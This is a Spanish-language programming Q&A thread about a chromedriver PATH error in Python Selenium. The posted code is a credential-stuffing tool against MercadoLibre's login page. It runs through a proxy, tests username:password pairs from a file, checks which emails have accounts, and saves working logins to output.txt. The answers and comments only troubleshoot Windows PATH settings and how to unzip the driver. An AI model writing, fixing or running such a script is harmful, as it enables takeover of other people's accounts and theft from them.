# 'chromedriver.exe' executable needs to be in PATH

Tags: python-3.x, selenium, chromedriver

Que tal estoy tratando de correr una implementación de python3.7 con selenium y utilizo el `webproxy de chrome`, pero al ingresar el nombre del archivo a leer falla y me da errores. Demostración gráfica:

[image: Demostración]

Ejecuto mi código y efectivamente encuentra el `webproxy de chrome` y al darle el filename, que lo tengo dentro de la misma carpeta donde se encuentra `ml.py`,  simplemente falla. No se si es una mala implementación del proxy de `chrome`. Intente poniendo la ruta completa desde `C:`, pero así ni lo ejecutaba.

[image: Log]

```
Correcto: se terminó el proceso "chromedriver.exe" con PID 75336.
Filename: ivoy.txt
c:/Users/user/Desktop/ml-checker/ml.py:138: DeprecationWarning: use options instead of chrome_options
  driver = webdriver.Chrome(chrome_options=chrome_options, executable_path='chromedriver.exe', service_args=service_arg)
Traceback (most recent call last):
  File "C:\Users\user\AppData\Local\Programs\Python\Python37\lib\site-packages\selenium\webdriver\common\service.py", line 76, in start
    stdin=PIPE)
  File "C:\Users\user\AppData\Local\Programs\Python\Python37\lib\subprocess.py", line 756, in __init__
    restore_signals, start_new_session)
  File "C:\Users\user\AppData\Local\Programs\Python\Python37\lib\subprocess.py", line 1155, in _execute_child
    startupinfo)
FileNotFoundError: [WinError 2] El sistema no puede encontrar el archivo especificado

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "c:/Users/user/Desktop/ml-checker/ml.py", line 149, in <module>
    driver = initialize_driver()
  File "c:/Users/user/Desktop/ml-checker/ml.py", line 138, in initialize_driver
    driver = webdriver.Chrome(chrome_options=chrome_options, executable_path='chromedriver.exe', service_args=service_arg)
  File "C:\Users\user\AppData\Local\Programs\Python\Python37\lib\site-packages\selenium\webdriver\chrome\webdriver.py", line 73, in __init__
    self.service.start()
  File "C:\Users\user\AppData\Local\Programs\Python\Python37\lib\site-packages\selenium\webdriver\common\service.py", line 83, in start
    os.path.basename(self.path), self.start_error_message)
selenium.common.exceptions.WebDriverException: Message: 'chromedriver.exe' executable needs to be in PATH. Please see https://sites.google.com/a/chromium.org/chromedriver/home
```

Dejo el código donde utilizo el `web driver de chrome`.

```
#<-Init selenium->
def initialize_driver():
    get_proxy()
    proxy = proxyy.pxy

    PROXY = proxy
    service_arg = [
        '--proxy-server=' + PROXY,
        '--proxy-type=html'
    ]
    chrome_options = Options()
    chrome_options.add_argument("--incognito")
    chrome_options.add_argument("--headless")
    chrome_options.add_argument("--no-sandbox")
    if 'win' in sys.platform :
        driver = webdriver.Chrome(chrome_options=chrome_options, executable_path='chromedriver.exe', service_args=service_arg)
    else:
        driver = webdriver.Chrome(chrome_options=chrome_options, executable_path='chromedriver.exe', service_args=service_arg)
    return driver
    
if __name__=="__main__":
    if 'win' in sys.platform:
        os.system('taskkill /IM chromedriver.exe /F')
    else:
        os.system("killall 'Google Chrome'")
    filename = input('Filename: ')
    driver = initialize_driver()
    driver.get('https://www.mercadolibre.com/jms/mla/lgz/msl/login/')
    time.sleep(5)
    username,login_button = find_elements_email(driver)
    username_list,password_list = make_list(filename)
    pass_list_length = len(username_list)
    print (que + "{0} logins loaded successfully".format(pass_list_length) + end)
    for i in range(0, pass_list_length):
        username,login_button = find_elements_email(driver)
        uName = username_list[i]
        send_userid(username,login_button,uName)
        try:
            is_link = is_location(driver)
            driver.implicitly_wait(2)
            if is_link:
                redirect = find_elements_link(driver)
                print(info + uName + ' has an account in another location')
                send_link(redirect)
                url = '{0}'.format(driver.current_url)
                driver.get(url)
                username,login_button = find_elements_email(driver)
                uName = username_list[i]
                send_userid(username,login_button,uName)
                driver.implicitly_wait(2)
                print(good + uName + ' has an account in mercadolibre')
                password,login_button2 = find_elements_pass(driver)
                pWord = password_list[i]
                send_password(password,login_button2,pWord)
                driver.implicitly_wait(2)
                valid_pass = is_password(driver,password)
                if valid_pass:
                    output = open("output.txt", "w")
                    print (good + "Logged in as {0} with password {1}".format(uName,pWord))
                    output.writelines('{0}:{1}\n'.format(uName,pWord))
                    driver.get('https://www.mercadolibre.com/jms/mla/lgz/msl/login/')
                    continue
                else:
                    print (bad + "Failed to login as {0} with password {1}".format(uName,pWord))
                    driver.get('https://www.mercadolibre.com/jms/mla/lgz/msl/login/')
                    print (que + "Attempt {0}/{1}".format(i+1,pass_list_length))
            else:
                print (bad + "{0} doesn`t have a mercadolibre account".format(uName))
                driver.get('https://www.mercadolibre.com/jms/mla/lgz/msl/login/')
                print (que + "Attempt {0}/{1}".format(i+1,pass_list_length))
        except KeyboardInterrupt:
            clear = ''
            if 'win' in sys.platform:
                clear = 'cls'
            else:
                clear = 'clear'
            print ("\n" * 80)
            os.system(clear)
            print (logo)
            print(info + " ~ Thanks to use this script! <3")
            sys.exit(0)
        except NoSuchElementException:
            valid = is_userid(driver,username)
            driver.implicitly_wait(2)
            if valid:
                print(good + uName + ' has an account in mercadolibre')
                password,login_button2 = find_elements_pass(driver)
                pWord = password_list[i]
                send_password(password,login_button2,pWord)
                time.sleep(2)
                valid_pass = is_password(driver,password)
                if valid_pass:
                    output = open("output.txt", "w")
                    print (good + "Logged in as {0} with password {1}".format(uName,pWord))
                    output.writelines('{0}:{1}\n'.format(uName,pWord))
                    continue
                else:
                    print (bad + "Failed to login as {0} with password {1}".format(uName,pWord))
                    driver.get('https://www.mercadolibre.com/jms/mla/lgz/msl/login/')
                    print (que + "Attempt {0}/{1}".format(i+1,pass_list_length))
            else:
                print (bad + "{0} doesn`t have a mercadolibre account".format(uName))
                driver.get('https://www.mercadolibre.com/jms/mla/lgz/msl/login/')
                print (que + "Attempt {0}/{1}".format(i+1,pass_list_length))
```

Comment: ya paso tiempo desde que expusiste esta pregunta y no recibo respuesta alguna de como configuraste el sistema para leer la variable PATH, si pudiste resolverlo deberias marcar la respuesta o escribir la diferente solucion que te funciono.

Answer (score 1):

Para poder ejecutar el script nesesitas poner el programa webdriver en PATH del sistema.
La descarga del programa esta [aqui](https://chromedriver.chromium.org/downloads)
Para poner el programa en la variable del sistema PATH y llamarlo desde la terminal o scripts de programas

**Busca la palabra `variables` con <kbd>WIN</kbd>+<kbd>S</kbd>**


[image: introducir la descripción de la imagen aquí]

**Luego seleciona variables del entorno del sistema**
[image: 1]
**Vas a selecionar la variable `Path` y seleccionas <kbd>Editar</kbd>**
[image: 2]
**Luego selecciona <kbd>Nuevo</kbd>**
[image: 3]
**Finalmente escribe la direccion de la ruta donde haz descargado y guardado el programa `chromedriver.exe`**
[image: 4]
Esto debe de solucionar tu problema

Comment: Hola que tal, segui al pie de la letra tus indicaciones pero no fue posible mitigar los errores

Comment: Adjunto la imagen, para ponerte en contexto: https://ibb.co/JprDPHq

Comment: @Novato1337 reinicia la computadora, la variable PATH se actualiza cuando instancias programas a partir de que la haz modificado. Si cambiaste la variable y tenias programas abiertos, estos no van a poder darse cuenta del cambio. En tu imagen tu error es el mismo: `chromedriver.exe` no esta en PATH

Comment: Tampoco reiniciando se puedo mi amigo, tambien intente desde el link que me pasaste descargar la version que ahi dice que es para el chrome que tengo, volvi a reiniciar y nada, de igual forma agradezco tu tiempo y te di un punto, yo tambien crei q

Comment: crei eso, estuvo bastante cerca

Comment: Mire un video donde en lugar de editar el path del cuadro de arriba edita el cuadro de abajo lo hice y volvi a reiniciar y tampoco...

Comment: @Novato1337 elproblema es el Visual Studio Code que usas, no tengo idea de porque no quiere leer PATH, cierra el proyecto, o hazlo de nuevo. En todo caso revisa bien las variables y que todo encaje. Te demuestro que el error esta solucionado, solo abre cualquier terminal y escribe `chromedriver.exe` y dale enter y vas a ver que lo reconoce...

Comment: C:\Users\user>chromedriver.exe
"chromedriver.exe" no se reconoce como un comando interno o externo,
programa o archivo por lotes ejecutable.

Comment: @Novato1337 como sospeche, no esta en PATH
a este punto estoy seguro que te haz equivocado con algun paso. O tu sistema esta malogrado. Si de verdad todo lo que haz hecho sigue y no funciona reformatea la pc. Asegurate de que sean variables de entorno del sistema y este en PATH, no haz hecho algo bien. El tutorial funciona ya lo probe hasta en VM

Answer (score 0):

@Novato1337 que tal bro, yo tenia el mismo error, el problema era que yo descomprimí el driver en una carpeta entonces se veía así:

driver=webdriver.Chrome(executable_path=r"C:\Users\egcsl\Desktop\PBOTS\chromedriver_win32\chromedriver")

Pero resolví el problema quitando "chromedriver_win32 entonces quedó así:

driver= webdriver.Chrome(executable_path=r"C:\Users\egcsl\Desktop\PBOTS\chromedriver")